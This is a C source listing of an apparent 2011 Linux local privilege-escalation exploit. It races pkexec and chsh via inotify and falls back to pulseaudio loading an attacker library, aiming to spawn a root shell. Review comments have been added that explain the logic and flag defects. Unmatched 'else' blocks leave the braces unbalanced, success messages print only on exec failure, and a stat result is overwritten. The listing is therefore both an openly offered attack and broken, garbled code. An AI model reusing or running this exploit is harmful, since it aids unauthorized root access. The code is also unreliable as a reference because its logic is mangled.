- /* pwnkernel.c 2011 */
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <sys/personality.h>
- #include <sys/stat.h>
- #include <sys/types.h>
- #include <sys/inotify.h>
- #define PU_PATH "/usr/bin/pulseaudio"
- #define PK_PATH "/usr/bin/pkexec"
- #define PATH_TO_EXPLOIT "/home/teste/exploit.so"
/*
 * Entry point of a 2011 local-privilege-escalation PoC aimed at the suid
 * pkexec / pulseaudio binaries named in PU_PATH / PK_PATH above.
 *
 * NOTE(review): this listing is not a compilable unit as pasted. Two
 * `} else {` blocks (after the pkexec execl and after the pulseaudio execl)
 * have no visible matching `if`, so the braces do not balance; the original
 * presumably branched on something (a fork?) that was lost in the paste.
 * Do not build or run this as-is; treat it as a historical fragment.
 *
 * Signature: argv is declared `int **argv`; the standard form is
 * `char **argv`. Neither argc nor argv is used.
 * Return: 0 on every path, including the error paths (a non-zero exit
 * status would be the conventional signal of failure).
 */
int main(int argc, int **argv) {
int ret,fd;
char pid_path[1024];
/* NOTE(review): this local shadows the fstat(2) library function. */
struct stat fstat;
/* PER_SVR4 personality; why this personality is wanted is not stated here
 * (presumably for the side flags it implies on Linux -- confirm against the
 * kernel's personality(2) documentation). */
ret = personality(PER_SVR4);
if (ret == -1) {
fprintf(stderr, "[-] Unable to set personality!\n");
return 0;
}
fprintf(stdout, " [+] Personality set to: PER_SVR4 ..\n");
/* Existence check only; the suid/owner check on this struct happens later. */
if (stat(PU_PATH, &fstat)) {
fprintf(stderr, "[-] PulseAudio doesnt exist!\n");
return 0;
}
/* NOTE(review): duplicated message -- this repeats the personality line
 * instead of reporting that PU_PATH was found. */
fprintf(stdout, " [+] Personality set to: PER_SVR4 ..\n");
/* This second stat() overwrites fstat: from here on the struct describes
 * PK_PATH, not PU_PATH. */
if (stat(PK_PATH, &fstat)) {
fprintf(stderr, "[-] PolicyKit (2010) doesnt exist!\n");
return 0;
}
fprintf(stderr, "[+] Gettin our PID for policykit exploiting ..\n");
/* pid_path is 1024 bytes, far larger than "/proc/" plus any pid, so this
 * sprintf cannot overflow; snprintf would still be the preferred form. */
sprintf(pid_path, "/proc/%i", getpid()); // could maybe do like /proc/self/exe ,or other trix ;>
/* NOTE(review): stdin/stdout/stderr are closed here, yet every fprintf
 * below still targets stderr. Those writes fail silently -- or land on
 * whatever file descriptor 2 is reused for next (inotify_init() below
 * will typically get fd 0). */
close(0);
close(1);
close(2);
/* Watch our own /proc/<pid> directory for IN_ACCESS events. Neither the
 * inotify_init() nor the inotify_add_watch() return value is checked. */
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
fprintf(stderr, "[+] Inotify watching ..\n");
/* NOTE(review): a zero-length read cannot return an inotify event; whether
 * this blocks until the first access and then fails, or returns at once,
 * is not established by this listing -- the result is discarded either way. */
read(fd, NULL, 0);
fprintf(stderr, "[!] Lets try exploit this race! chsh() first ..\n");
/* execl() only returns on failure, so on success nothing below this line
 * in the current process ever runs; the "[+] Success!" message and the
 * second execl are reached only when chsh could NOT be executed. */
execl("/usr/bin/chsh", "chsh", NULL);
fprintf(stderr, "[+] Success! Now the MAIN pxexec() binary ..\n");
execl(PK_PATH, "pkexec", "/bin/sh", NULL);
/* Same here: only reachable if the pkexec execl failed. */
fprintf(stderr, "[*] Got root using pkexec() local!\n");
/* NOTE(review): no matching `if` is visible for this `else` -- the paste
 * appears to have lost the branch that separates the two code paths. */
} else {
sleep(2);
}
/* fstat currently holds the stat() result for PK_PATH (the last stat call
 * above), so only pkexec is checked for setuid-root here, despite the
 * message naming both binaries. */
if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) {
fprintf(stderr, "[-] Pulseaudio/PolicyKit-2010 is not suid root!\n");
return 0;
}
fprintf(stderr, "[=] Failsafer running,try revive this exploit ..\n");
/* Fallback path: run pulseaudio with -L pointing at PATH_TO_EXPLOIT
 * (a hard-coded absolute path into a specific user's home directory). */
execl(PU_PATH, PU_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL);
/* NOTE(review): second unmatched `else`; see the note on the first one. */
} else {
/* pkexec is given /bin/su -c /bin/sh with PATH_TO_EXPLOIT as a further
 * argument; the "[*] Success" line is, again, only reached on exec failure. */
execl(PK_PATH, "pkexec", "/bin/su", "-c", "/bin/sh", PATH_TO_EXPLOIT, NULL);
fprintf(stderr, "[*] Success ..\n");
}
return 0;
}
- // E0F 2011